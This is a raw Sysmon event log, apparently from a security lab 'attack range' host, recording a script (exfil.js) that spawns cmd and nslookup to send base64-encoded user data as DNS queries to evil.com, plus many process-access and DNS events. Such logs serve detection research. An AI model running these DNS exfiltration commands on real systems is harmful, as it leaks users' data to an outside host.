2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.709{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfubeg.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000199686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.664{00000000-0000-0000-0000-000000000000}7292evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.600{00000000-0000-0000-0000-000000000000}4192evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.531{00000000-0000-0000-0000-000000000000}1344evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.465{00000000-0000-0000-0000-000000000000}7848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.392{00000000-0000-0000-0000-000000000000}5912evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.332{00000000-0000-0000-0000-000000000000}3168evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.268{00000000-0000-0000-0000-000000000000}4540evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.213{00000000-0000-0000-0000-000000000000}6196evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.145{00000000-0000-0000-0000-000000000000}1496evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.075{00000000-0000-0000-0000-000000000000}7184evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.997{00000000-0000-0000-0000-000000000000}6156evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.920{00000000-0000-0000-0000-000000000000}7220evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.849{00000000-0000-0000-0000-000000000000}7508evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000199673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.671{2E1864BB-17BC-629A-2440-000000005F02}51242388C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-2540-000000005F02}7396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.671{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.671{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.671{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.671{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.671{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2540-000000005F02}7396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.671{2E1864BB-17BC-629A-2340-000000005F02}41364624C:\Windows\system32\cmd.exe{2E1864BB-17BC-629A-2540-000000005F02}7396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.676{2E1864BB-17BC-629A-2540-000000005F02}7396C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BC-629A-2340-000000005F02}4136C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfubeg.tmp 2>&1 10341000x8000000000000000199665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.639{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-2440-000000005F02}5124C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.639{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-2440-000000005F02}5124C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.624{2E1864BB-17BC-629A-2440-000000005F02}51242388C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-2340-000000005F02}4136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.608{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2440-000000005F02}5124C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.604{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.604{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.601{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2340-000000005F02}4136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.603{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.603{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.601{2E1864BB-17A1-629A-783D-000000005F02}55525420C:\Windows\System32\WScript.exe{2E1864BB-17BC-629A-2340-000000005F02}4136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.602{2E1864BB-17BC-629A-2340-000000005F02}4136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfubeg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.570{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfamzw.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.508{2E1864BB-17BC-629A-2140-000000005F02}61727408C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-2240-000000005F02}2308C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.508{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.508{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.073{00000000-0000-0000-0000-000000000000}7184<unknown process>-udpfalsefalse127.0.0.1-52638-false127.0.0.1-53domain 354300x8000000000000000199649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.073{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52638- 10341000x8000000000000000199648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.508{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.073{00000000-0000-0000-0000-000000000000}7184<unknown process>-udptruefalse127.0.0.1-52638-false127.0.0.1-53domain 10341000x8000000000000000199646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.508{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.073{00000000-0000-0000-0000-000000000000}7184<unknown process>-udpfalsefalse127.0.0.1-52637-false127.0.0.1-53domain 354300x8000000000000000199644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.073{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52637- 10341000x8000000000000000199643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 